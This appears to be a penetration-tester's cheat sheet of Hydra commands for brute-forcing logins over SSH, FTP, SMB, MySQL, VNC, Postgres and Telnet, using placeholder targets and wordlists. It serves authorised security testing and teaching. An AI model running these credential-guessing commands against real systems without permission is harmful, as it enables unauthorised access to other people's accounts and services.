% bruteforce, access

# Hydra - ssh - userlist and password list - 22
hydra -L <userlist> -P <passlist> <ip> ssh  

# Hydra - ssh - user and password  - 22
hydra -l <user|root> -p <password|root> <ip> ssh  

# Hydra - ssh - user=password - 22
hydra -L <userlist> -e s <ip> ssh  

# Hydra - ssh - null password - 22
hydra -l <user|root> -e n <ip> ssh  

# Hydra - ssh - password=reverseuser - 22
hydra -L <userlist> -e r <ip> ssh  

# Hydra - ssh - file "login:pass" format - specify port
hydra -t 4 -s <port> -C <file_login_pass> <ip> ssh  

# Hydra - ftp - 21 
hydra -L <userlist> -P <passlist> <ip> ftp  

# Hydra - smb - 445
hydra -L <userlist> -P <passlist> <ip> smb 

# Hydra - mysql - 3306
hydra -L <userlist> -P <passlist> <ip> mysql  

# Hydra - vnc - 5900
hydra -L <userlist> -P <passlist> <ip> vnc  

# Hydra - postgres - 5432
hydra -L <userlist> -P <passlist> <ip> postgres 

# Hydra - telnet - 23
hydra -L <userlist> -P <passlist> <ip> telnet  
